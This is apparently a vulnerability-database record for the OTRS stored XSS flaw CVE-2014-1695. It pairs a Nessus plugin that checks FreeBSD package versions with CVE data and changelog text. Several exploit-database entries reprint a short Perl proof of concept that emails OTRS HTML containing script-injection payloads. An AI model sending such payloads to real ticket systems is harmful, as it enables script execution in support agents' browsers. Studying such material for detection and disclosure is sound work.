FreeBSD : otrs -- XSS Issue (70b72a52-9e54-11e3-babe-60a44c524f57)
2014-02-26T00:00:00
ID FREEBSD_PKG_70B72A529E5411E3BABE60A44C524F57.NASL Type nessus Reporter This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2014-02-26T00:00:00
Description
The OTRS Project reports :
An attacker could send a specially prepared HTML email to OTRS. If he
can then trick an agent into following a special link to display this
email, JavaScript code would be executed.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from the FreeBSD VuXML database :
#
# Copyright 2003-2018 Jacques Vidrine and contributors
#
# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
# HTML, PDF, PostScript, RTF and so forth) with or without modification,
# are permitted provided that the following conditions are met:
# 1. Redistributions of source code (VuXML) must retain the above
# copyright notice, this list of conditions and the following
# disclaimer as the first lines of this file unmodified.
# 2. Redistributions in compiled form (transformed to other DTDs,
# published online in any format, converted to PDF, PostScript,
# RTF and other formats) must reproduce the above copyright
# notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
#
# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Metadata registration. This branch runs only when `description` is set; it
# declares the plugin's identity, references and prerequisites and then calls
# exit(0), so the package check further down is not reached in that mode.
if (description)
{
script_id(72696);
script_version("1.9");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");
# The only CVE this check is tied to.
script_cve_id("CVE-2014-1695");
script_name(english:"FreeBSD : otrs -- XSS Issue (70b72a52-9e54-11e3-babe-60a44c524f57)");
# Detection is by installed package version (pkg_info output); the OTRS web
# interface itself is not probed.
script_summary(english:"Checks for updated packages in pkg_info output");
script_set_attribute(
attribute:"synopsis",
value:
"The remote FreeBSD host is missing one or more security-related
updates."
);
# Advisory text as quoted from the OTRS Project: the script runs in the
# browser of an agent who is lured into opening the crafted email via a link.
script_set_attribute(
attribute:"description",
value:
"The OTRS Project reports :
An attacker could send a specially prepared HTML email to OTRS. If he
can then trick an agent into following a special link to display this
email, JavaScript code would be executed."
);
# https://www.otrs.com/security-advisory-2014-03-xss-issue/
# NOTE(review): the registered see_also value is the vendor home page, not the
# advisory named in the comment above; use the commented URL to find the advisory.
script_set_attribute(
attribute:"see_also",
value:"https://otrs.com"
);
# https://vuxml.freebsd.org/freebsd/70b72a52-9e54-11e3-babe-60a44c524f57.html
# The registered value is a short link; presumably it redirects to the VuXML
# entry named above -- confirm before relying on it.
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?1a4f58fd"
);
script_set_attribute(attribute:"solution", value:"Update the affected packages.");
# CVSS v2 base vector: network vector, medium access complexity, no
# authentication, partial integrity impact, no confidentiality or
# availability impact.
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N");
# NOTE(review): no exploit_available / exploitability_ease attribute is set in
# this block, so the absence of those fields in scan output should not be read
# as "no public exploit exists" when prioritising this finding.
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:otrs");
script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");
script_set_attribute(attribute:"vuln_publication_date", value:"2014/02/25");
script_set_attribute(attribute:"patch_publication_date", value:"2014/02/25");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/02/26");
script_end_attributes();
# ACT_GATHER_INFO: presumably marks the plugin as information gathering only
# -- confirm against the NASL category definitions.
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"FreeBSD Local Security Checks");
# Prerequisites: ssh_get_info.nasl is declared as a dependency and the three
# KB keys below are required. Presumably the plugin is skipped when they are
# absent, which would leave a scan without local checks with no result at all
# from this plugin (neither affected nor clean).
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");
exit(0);
}
include("audit.inc");
include("freebsd_package.inc");
# Preconditions, read from the knowledge base: local checks enabled, a FreeBSD
# release recorded for the host, and a package inventory available. A missing
# item is reported through audit() instead of being treated as a finding.
if (!get_kb_item("Host/local_checks_enabled"))
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/FreeBSD/release"))
  audit(AUDIT_OS_NOT, "FreeBSD");
if (!get_kb_item("Host/FreeBSD/pkg_info"))
  audit(AUDIT_PACKAGE_LIST_MISSING);

# Version-range tests against the installed otrs package. The upper bounds are
# the fixed releases 3.1.20, 3.2.15 and 3.3.5. All three tests are always
# evaluated; save_report:TRUE presumably lets pkg_report_get() list every
# match -- confirm in freebsd_package.inc.
# NOTE(review): the first range has no lower bound, so any otrs package older
# than 3.1.20 is flagged, not only the 3.1.x branch.
# Caveat: the verdict reflects the package inventory only. An OTRS instance
# installed outside the package system would not appear in it, and a locally
# patched package that keeps an old version string would still be flagged.
affected = FALSE;

if (pkg_test(save_report:TRUE, pkg:"otrs<3.1.20"))
  affected = TRUE;
if (pkg_test(save_report:TRUE, pkg:"otrs>3.2.*<3.2.15"))
  affected = TRUE;
if (pkg_test(save_report:TRUE, pkg:"otrs>3.3.*<3.3.5"))
  affected = TRUE;

# No range matched: record the host as not affected. Otherwise raise a
# warning-level finding, attaching the package report when verbosity allows.
if (!affected)
  audit(AUDIT_HOST_NOT, "affected");
else
{
  if (report_verbosity > 0)
    security_warning(port:0, extra:pkg_report_get());
  else
    security_warning(0);
  exit(0);
}
{"id": "FREEBSD_PKG_70B72A529E5411E3BABE60A44C524F57.NASL", "bulletinFamily": "scanner", "title": "FreeBSD : otrs -- XSS Issue (70b72a52-9e54-11e3-babe-60a44c524f57)", "description": "The OTRS Project reports :\n\nAn attacker could send a specially prepared HTML email to OTRS. If he\ncan then trick an agent into following a special link to display this\nemail, JavaScript code would be executed.", "published": "2014-02-26T00:00:00", "modified": "2014-02-26T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://www.tenable.com/plugins/nessus/72696", "reporter": "This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?1a4f58fd", "https://otrs.com"], "cvelist": ["CVE-2014-1695"], "type": "nessus", "lastseen": "2021-01-07T10:45:32", "edition": 22, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-1695"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:547FEE8AB5755B73089DAB4C1DD1B2B9"]}, {"type": "freebsd", "idList": ["70B72A52-9E54-11E3-BABE-60A44C524F57"]}, {"type": "exploitdb", "idList": ["EDB-ID:36842"]}, {"type": "nessus", "idList": ["MANDRIVA_MDVSA-2014-054.NASL", "DEBIAN_DLA-1119.NASL", "OPENSUSE-2014-202.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30637", "SECURITYVULNS:VULN:13733"]}, {"type": "zdt", "idList": ["1337DAY-ID-23570"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:131654"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891119", "OPENVAS:1361412562310804243"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1119-1:89666"]}], "modified": "2021-01-07T10:45:32", "rev": 2}, "score": {"value": 5.2, "vector": "NONE", "modified": "2021-01-07T10:45:32", "rev": 2}, "vulnersScore": 5.2}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML 
database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72696);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-1695\");\n\n script_name(english:\"FreeBSD : otrs -- XSS Issue (70b72a52-9e54-11e3-babe-60a44c524f57)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The OTRS Project reports :\n\nAn attacker could send a specially prepared HTML email to OTRS. 
If he\ncan then trick an agent into following a special link to display this\nemail, JavaScript code would be executed.\"\n );\n # https://www.otrs.com/security-advisory-2014-03-xss-issue/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://otrs.com\"\n );\n # https://vuxml.freebsd.org/freebsd/70b72a52-9e54-11e3-babe-60a44c524f57.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1a4f58fd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:otrs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"otrs<3.1.20\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"otrs>3.2.*<3.2.15\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"otrs>3.3.*<3.3.5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "FreeBSD Local Security Checks", "pluginID": "72696", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:otrs"], "scheme": null, "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:14:27", "description": "Cross-site scripting (XSS) vulnerability in Open Ticket Request System (OTRS) 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5 allows remote attackers to inject arbitrary web script or HTML via a crafted HTML email.", "edition": 4, "cvss3": {}, "published": "2014-03-01T00:01:00", "title": "CVE-2014-1695", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1695"], "modified": "2015-10-13T16:35:00", "cpe": ["cpe:/a:otrs:otrs:3.1.3", "cpe:/a:otrs:otrs:3.1.2", "cpe:/a:otrs:otrs:3.2.10", "cpe:/a:otrs:otrs:3.1.5", "cpe:/a:otrs:otrs:3.1.14", "cpe:/a:otrs:otrs:3.1.19", "cpe:/a:otrs:otrs:3.2.6", "cpe:/a:otrs:otrs:3.2.2", "cpe:/a:otrs:otrs:3.1.6", "cpe:/a:otrs:otrs:3.2.3", "cpe:/a:otrs:otrs:3.1.8", "cpe:/a:otrs:otrs:3.1.15", "cpe:/a:otrs:otrs:3.1.9", "cpe:/a:otrs:otrs:3.1.11", "cpe:/a:otrs:otrs:3.2.0", "cpe:/a:otrs:otrs:3.2.8", "cpe:/a:otrs:otrs:3.1.0", "cpe:/a:otrs:otrs:3.3.1", "cpe:/a:otrs:otrs:3.3.4", "cpe:/a:otrs:otrs:3.2.14", "cpe:/a:otrs:otrs:3.1.10", "cpe:/a:otrs:otrs:3.3.2", "cpe:/a:otrs:otrs:3.3.3", "cpe:/a:otrs:otrs:3.3.0", "cpe:/a:otrs:otrs:3.1.13", "cpe:/a:otrs:otrs:3.2.7", "cpe:/a:otrs:otrs:3.2.5", "cpe:/a:otrs:otrs:3.1.17", "cpe:/a:otrs:otrs:3.2.4", "cpe:/a:otrs:otrs:3.2.1", "cpe:/a:otrs:otrs:3.1.16", "cpe:/a:otrs:otrs:3.1.1", "cpe:/a:otrs:otrs:3.1.18", "cpe:/a:otrs:otrs:3.1.7", "cpe:/a:otrs:otrs:3.1.4", "cpe:/a:otrs:otrs:3.2.9"], "id": "CVE-2014-1695", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1695", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:otrs:otrs:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.3.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.3.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.19:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.3.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.15:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.3.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.4:*:*:*:*:*:*:*", 
"cpe:2.3:a:otrs:otrs:3.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.3.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.3:*:*:*:*:*:*:*"]}], "exploitpack": [{"lastseen": "2020-04-01T19:04:38", "description": "\nOTRS 3.1.x 3.2.x 3.3.x - Persistent Cross-Site Scripting", "edition": 1, "published": "2015-04-27T00:00:00", "title": "OTRS 3.1.x 3.2.x 3.3.x - Persistent Cross-Site Scripting", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1695"], "modified": "2015-04-27T00:00:00", "id": "EXPLOITPACK:547FEE8AB5755B73089DAB4C1DD1B2B9", "href": "", "sourceData": "# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS\n# Date: 28.01.2014\n# Exploit Author: Adam Ziaja http://adamziaja.com\n# Vendor Homepage: https://www.otrs.com\n# Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5\n# CVE : CVE-2014-1695\n\n#!/usr/bin/perl -w\nuse strict;\nuse MIME::Lite;\nmy $msg = MIME::Lite->new(\n Subject => 'OTRS XSS PoC',\n From => 'attacker@example.com',\n To => 'otrs@example.com',\n Type => 'text/html',\n Data =>\n '<html><body><img/onerror=\"alert(\\'XSS1\\')\"src=a><iframe\nsrc=javascript:alert(\\'XSS2\\') ></body></html>'\n);\n$msg->send();", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:30", "bulletinFamily": "unix", "cvelist": ["CVE-2014-1695"], "description": "\nThe OTRS Project reports:\n\nAn attacker could send a specially prepared HTML email to OTRS. 
If\nhe can then trick an agent into following a special link to display this email,\nJavaScript code would be executed.\n\n", "edition": 4, "modified": "2014-02-25T00:00:00", "published": "2014-02-25T00:00:00", "id": "70B72A52-9E54-11E3-BABE-60A44C524F57", "href": "https://vuxml.freebsd.org/freebsd/70b72a52-9e54-11e3-babe-60a44c524f57.html", "title": "otrs -- XSS Issue", "type": "freebsd", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2016-02-04T04:29:24", "description": "OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS). CVE-2014-1695. Webapps exploit for php platform", "published": "2015-04-27T00:00:00", "type": "exploitdb", "title": "OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1695"], "modified": "2015-04-27T00:00:00", "id": "EDB-ID:36842", "href": "https://www.exploit-db.com/exploits/36842/", "sourceData": "# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS\r\n# Date: 28.01.2014\r\n# Exploit Author: Adam Ziaja http://adamziaja.com\r\n# Vendor Homepage: https://www.otrs.com\r\n# Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5\r\n# CVE : CVE-2014-1695\r\n\r\n#!/usr/bin/perl -w\r\nuse strict;\r\nuse MIME::Lite;\r\nmy $msg = MIME::Lite->new(\r\n Subject => 'OTRS XSS PoC',\r\n From => 'attacker@example.com',\r\n To => 'otrs@example.com',\r\n Type => 'text/html',\r\n Data =>\r\n '<html><body><img/onerror=\"alert(\\'XSS1\\')\"src=a><iframe\r\nsrc=javascript:alert(\\'XSS2\\') ></body></html>'\r\n);\r\n$msg->send();\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/36842/"}], "zdt": [{"lastseen": "2018-03-03T03:41:45", "description": "Exploit for php platform in category web applications", "edition": 2, "published": "2015-04-27T00:00:00", "type": "zdt", "title": "OTRS < 3.1.x & < 3.2.x & < 3.3.x - 
Stored Cross-Site Scripting (XSS) Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1695"], "modified": "2015-04-27T00:00:00", "id": "1337DAY-ID-23570", "href": "https://0day.today/exploit/description/23570", "sourceData": "# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS\r\n# Date: 28.01.2014\r\n# Exploit Author: Adam Ziaja http://adamziaja.com\r\n# Vendor Homepage: https://www.otrs.com\r\n# Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5\r\n# CVE : CVE-2014-1695\r\n \r\n#!/usr/bin/perl -w\r\nuse strict;\r\nuse MIME::Lite;\r\nmy $msg = MIME::Lite->new(\r\n Subject => 'OTRS XSS PoC',\r\n From => '[email\u00a0protected]',\r\n To => '[email\u00a0protected]',\r\n Type => 'text/html',\r\n Data =>\r\n '<html><body><img/onerror=\"alert(\\'XSS1\\')\"src=a><iframe\r\nsrc=javascript:alert(\\'XSS2\\') ></body></html>'\r\n);\r\n$msg->send();\n\n# 0day.today [2018-03-03] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/23570"}], "packetstorm": [{"lastseen": "2016-12-05T22:17:59", "description": "", "published": "2015-04-27T00:00:00", "type": "packetstorm", "title": "OTRS 3.x Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1695"], "modified": "2015-04-27T00:00:00", "id": "PACKETSTORM:131654", "href": "https://packetstormsecurity.com/files/131654/OTRS-3.x-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS \n# Date: 28.01.2014 \n# Exploit Author: Adam Ziaja http://adamziaja.com \n# Vendor Homepage: https://www.otrs.com \n# Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5 \n# CVE : CVE-2014-1695 \n \n#!/usr/bin/perl -w \nuse strict; \nuse MIME::Lite; \nmy $msg = MIME::Lite->new( \nSubject => 'OTRS XSS PoC', \nFrom => 'attacker@example.com', \nTo => 'otrs@example.com', \nType => 'text/html', \nData => 
\n'<html><body><img/onerror=\"alert(\\'XSS1\\')\"src=a><iframe \nsrc=javascript:alert(\\'XSS2\\') ></body></html>' \n); \n$msg->send(); \n \n \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/131654/otrs31x-xss.txt"}], "nessus": [{"lastseen": "2021-01-20T12:27:26", "description": "The OTRS ticket system was updated to 3.1.20 / 3.2.15 :\n\nOn openSUSE 12.3 it was updated to 3.1.20: (fix for OSA-2014-03,\nCVE-2014-1695)\n\n - Improved HTML filter.\n\n - 3.1.19 2014-01-28\n\n - Fixed bug#10158 - Missing quoting in\n State::StateGetStatesByType().\n\n - Fixed bug#10099 - Missing challenge token checks on\n customer interface.\n\n - Fixed bug#8489 - setting Tickets per page resets\n AgentTicketQueue.\n\n - Fixed bug#9661 - Useless code in DynamicField backend.\n\n - Fixed bug#9622 - Actions in Small ticket overview don't\n work when cookies are turned off.\n\n - Fixed bug#9541 - Package manager cannot use https proxy.\n\n - Fixed bug#9594 - No auto-reply sent with multiple From\n addresses in AgentTicketPhone on PostgreSQL and Oracle.\n\n - Fixed bug#3434 - Validity of search time frame not\n checked by OTRS.\n\n - Fixed bug#9596 - On merge and bounce screens is\n confusing when fill or not 'To', 'Subject' and 'Body'\n fields.\n\n - Fixed bug#9595 - Incomplete page reload handling in\n merge and bounce.\n\n - Fixed bug#3007 - CheckMXRecord and CheckEmailAddresses\n have no effect on AgentTicketBounce.\n\n - Fixed bug#9512 - Database error for invalid date in\n AgentTicketSearch.\n\n - Fixed bug#8835 - No article found for TicketID <TICKET\n ID> when showing group tickets\n\n - Fixed bug#9583 - Dynamic Fields of type Date have\n timestamp in notifications.\n\n - Fixed bug#9579 - SOAP Serializer used in\n Kernel/GenericInterface/Transport/ HTTP/SOAP.pm does not\n correctly set namespace.\n\n - Fixed bug#7359 - Setting pending states via generic\n agent does not 
set pending time.\n\n - Fixed bug#8380 - Middle name not displayed in\n AdminCustomerUser.\n\n - Fixed bug#9576 - GI TicketSearch Date and Date/Time\n dynamic fields are ignored.\n\n - Changed Dynamic Field SearchFieldParameterBuild() API,\n LayoutObject is now optional.\n\n - Fixed bug#9573 - Date and DateTime dynamic fields not\n considered in GenericAgent Jobs.\n\nOn openSUSE 13.1 it was updated to 3.2.15: (fix for OSA-2014-03,\nCVE-2014-1695)\n\n - Improved HTML filter.\n\n - Fixed bug#10207 - DynamicField Search-Function in\n CustomerFrontend is not working.\n\n - Followup for bug#9011 - New value after value mapping\n can't be 0.\n\n - Fixed bug#10214 - Value '0' for DynamicsFields prevents\n TicketCreation.\n\n - Fixed bug#9616 - Too long activities and transitions are\n not displayed correctly.\n\n - Fixed bug#10212 - My tickets & Company tickets in 3.3.4.\n\n - Fixed bug#10205 - GenericInterface: Mandatory TimeUnits\n can't be 0.\n\n - Fixed bug#10196 - Ticket merge action does not notify\n the owner of the existing ticket.\n\n - Fixed bug#9692 - On PhoneOutbound articles, the FROM\n field shows Customer ID instead Agent ID.\n\n - Fixed bug#10189 - ProcessManagement: Use article subject\n if no ticket title is set.\n\n - Fixed bug#9654 - TicketUpdate operation doesn't work\n when authenticated as a customer.\n\n - Fixed bug#10137 - Generic interface TicketCreate\n operation doesn't work when authenticated as a customer.\n\n - 3.2.14\n\n - Fixed bug#10172 - Can't create process tickets with\n disabled richtext.\n\n - Fixed bug#10121 - QQMails break in OTRS.\n\n 